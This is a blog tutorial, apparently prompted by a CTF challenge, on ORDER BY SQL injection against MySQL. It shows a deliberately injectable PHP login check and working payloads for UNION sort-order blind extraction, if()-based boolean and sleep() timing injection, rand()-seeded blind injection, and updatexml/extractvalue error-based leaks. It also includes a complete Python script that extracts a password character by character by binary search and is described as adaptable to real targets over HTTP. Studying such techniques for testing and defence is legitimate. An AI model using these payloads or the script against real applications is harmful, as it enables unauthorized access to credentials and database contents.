
Order by injection of SQL injection

2022-06-27 08:19:00 devil8123665

At the Anheng Cup I saw ORDER BY blind injection being used. I remembered having summarised ORDER BY injection methods before, and looking through my notes I did find an entry titled "order by injection", but there was nothing written in it. Checking the details, it was created on 11 August 2017. Procrastination and forgetfulness, truly.

Understanding order by

ORDER BY is how MySQL sorts the rows returned by a query. Usage examples:

select * from <table> order by <column name or position> asc;   # ascending (the default)
select * from <table> order by <column name or position> desc;  # descending

The point here is that what follows ORDER BY can be either a column name or a number, where the number is the 1-based position of a column in the result. For example, if id is the first column of the user table, sorting by id can be written in two ways:

select * from user order by id;
select * from user order by 1;

ORDER BY blind injection

Combined with UNION

This was seen at the Anheng Cup. The key backend code:

$sql = "select * from admin where username='".$username."'";   // $username is concatenated unescaped: injectable
$result = mysql_query($sql);
$row = mysql_fetch_array($result);                               // only the first row of the result is examined
if(isset($row)&&$row['username']!="admin"){
	$hit="username error!";                                      // first row is not the admin row
}else{
	if ($row['password'] === $password){
		$hit="";                                                 // login succeeds
	}else{
		$hit="password error!";                                  // first row is the admin row, wrong password
	}
}

payload (the trailing quote of the original query has to be commented out, for example with # or -- )

username=admin' or 1 union select 1,2,binary '<string>' order by 3#

The SQL statement becomes

select * from admin where username='admin' or 1 union select 1,2,binary '<string>' order by 3;

MySQL now sorts the combined result on the third column, i.e. it compares the injected string with the real password, and whichever row comes first decides the message the page shows. From the two different responses the password can be blind-injected character by character. Add binary: the default column collations (the *_ci ones) compare strings case-insensitively, so without it 'a' and 'A' sort as equal and the case of the password cannot be recovered.

Example

mysql> select * from order1;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | uP10AcB  |
+------+----------+----------+

mysql> select * from order1 where username='' or 1 union select 1,2,'v' order by 3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | uP10AcB  |
|    1 | 2        | v        |
+------+----------+----------+

mysql> select * from order1 where username='' or 1 union select 1,2,'a' order by 3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | 2        | a        |
|    1 | admin    | uP10AcB  |
+------+----------+----------+

mysql> select * from order1 where username='' or 1 union select 1,2,'u' order by 3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | 2        | u        |
|    1 | admin    | uP10AcB  |
+------+----------+----------+

Here order by 3 sorts on the third column. If the injected string sorts before the password, our row 1,2,'a' becomes the first row; the code reads only that row, its username is 2 rather than admin, and the page returns username error!. If the injected string sorts after the password, the real row comes first and the page returns password error!. A prefix such as 'u' sorts before the longer 'uP10AcB', so the password can be extended one character at a time, with a binary search over the character range at each position.
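As an added example (not code from the original post), here is the whole loop automated in Python. A small sqlite3 database stands in for the MySQL admin table with the constructed row (1, 'admin', 'uP10AcB'); vulnerable_login() mirrors the PHP above (unescaped concatenation, first row only, username checked before password); extract_password() recovers the password one character at a time by binary search over the two responses. Two details are assumptions of this example rather than part of the page: SQLite compares text byte by byte, which gives the same effect as MySQL's binary, and the payload sorts with order by 3,1 and gives the injected row id 0, so that when the guess equals the real password the tie is broken in favour of the injected row and the oracle becomes a clean "guess <= password" test (with a plain order by 3 the order of tied rows is undefined). The same extract_password() loop works unchanged for the if() and rand() oracles later on the page; only the oracle function changes.

```python
import sqlite3

SAMPLE_PASSWORD = "uP10AcB"   # constructed sample data, same value as the page's order1 table


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the admin table of the vulnerable application."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin(id integer, username text, password text)")
    conn.execute("insert into admin values (1, 'admin', ?)", (SAMPLE_PASSWORD,))
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Port of the PHP login check: unescaped concatenation, first row only."""
    sql = "select * from admin where username='" + username + "'"   # injectable
    row = conn.execute(sql).fetchone()                               # mysql_fetch_array: first row
    if row is not None and row[1] != "admin":
        return "username error!"
    if row is not None and row[2] == password:
        return ""
    return "password error!"


def injected_sorts_first(conn: sqlite3.Connection, guess: str) -> bool:
    """Oracle: True iff guess <= real password under byte-wise comparison.

    The injected row (0, 2, guess) is appended with UNION and the result is
    sorted on column 3 (password), then column 1 (id) as the tie-breaker
    (the tie-breaker is this example's addition). If the injected row ends
    up first its username is 2, not admin, and the page answers
    'username error!'; otherwise the real row is first and the page
    answers 'password error!'.
    """
    escaped = guess.replace("'", "''")   # SQLite escaping; against MySQL also escape backslashes
    payload = "admin' or 1 union select 0,2,'" + escaped + "' order by 3,1 -- "  # '-- ' eats the trailing quote
    return vulnerable_login(conn, payload, "") == "username error!"


def extract_password(conn: sqlite3.Connection, max_len: int = 64) -> str:
    """Recover the password character by character, binary searching each position."""
    found = ""
    lo_char, hi_char = 0x21, 0x7E        # printable ASCII without space (assumed charset)
    while len(found) < max_len:
        # If even the smallest extension sorts after the real password, found is complete.
        if not injected_sorts_first(conn, found + chr(lo_char)):
            return found
        lo, hi = lo_char, hi_char
        while lo < hi:                   # largest c with found + chr(c) <= password
            mid = (lo + hi + 1) // 2
            if injected_sorts_first(conn, found + chr(mid)):
                lo = mid
            else:
                hi = mid - 1
        found += chr(lo)
    return found


if __name__ == "__main__":
    db = build_db()
    print(extract_password(db))          # about 8 requests per character instead of 94
```

Against a real target, vulnerable_login() is replaced by an HTTP request and the comparison of the response body; everything else stays the same.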

Blind injection based on if()

When the column name is known

Sorting on different columns produces different pages, so a condition can be turned into a choice of sort column and read off from the page.

Example:

order by if(1=1,id,username);

Column positions cannot be used in place of the column names here: MySQL treats only a bare integer literal in ORDER BY as a column position, whereas if(1=1,1,2) is an expression that evaluates to a constant, so neither branch changes the sort order.

When the column name is unknown

payload

order by if(<expression>,1,(select table_name from information_schema.tables))

When the expression is false MySQL evaluates the subquery branch, which returns more than one row, and the statement fails with ERROR 1242 (21000): Subquery returns more than 1 row, so the page shows no data. When the expression is true only the constant branch is evaluated and the page renders normally.

Time-based blind injection

payload

order by if(1=1,1,sleep(1))

Test results

select * from ha order by if(1=1,1,sleep(1)); # returns in normal time
select * from ha order by if(1=2,1,sleep(1)); # delayed

During testing the delay was longer than the 1 second of sleep(1): the ORDER BY expression is evaluated once per row being sorted, so the delay is a multiple of the number of rows in the result. Formula:

delay = seconds in sleep(n) * number of rows in the result

My test table ha has five rows, so the delay was 5 seconds. If the query returns many rows the delay becomes very long; when writing a script, set a timeout on the request (and keep the sleep value small) instead of waiting for the full delay.

Blind injection based on rand()

I will not repeat the principle; look straight at the test results

mysql> select * from ha order by rand(true);
+----+------+
| id | name |
+----+------+
|  9 | NULL |
|  6 | NULL |
|  5 | NULL |
|  1 | dss  |
|  0 | dasd |
+----+------+
mysql> select * from ha order by rand(false);
+----+------+
| id | name |
+----+------+
|  1 | dss  |
|  6 | NULL |
|  0 | dasd |
|  5 | NULL |
|  9 | NULL |
+----+------+

rand(seed) with a constant seed produces a repeatable sequence, and the sequences for true (seed 1) and false (seed 0) differ, so the two orderings are different but each is stable across requests. A condition can therefore be used as the seed and read off from the row order. Example

order by rand(ascii(mid((select database()),1,1))>96)

Error-based injection via ORDER BY

I have also seen error-based injection through ORDER BY described online. Link to the original text

updatexml

select * from ha order by updatexml(1,if(1=1,1,user()),1);# query runs normally
select * from ha order by updatexml(1,if(1=2,1,user()),1);# query errors, the message contains user()

extractvalue

select * from ha order by extractvalue(1,if(1=1,1,user()));# query runs normally
select * from ha order by extractvalue(1,if(1=2,1,user()));# query errors, the message contains user()

In practice wrap the value as concat(0x7e, ...) so that it is always an invalid XPath expression and the XPATH syntax error is guaranteed; the error message shows at most 32 characters, so longer values have to be read in pieces with substr().

 

Copyright notice
This article was written by [devil8123665]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/178/202206270801540635.html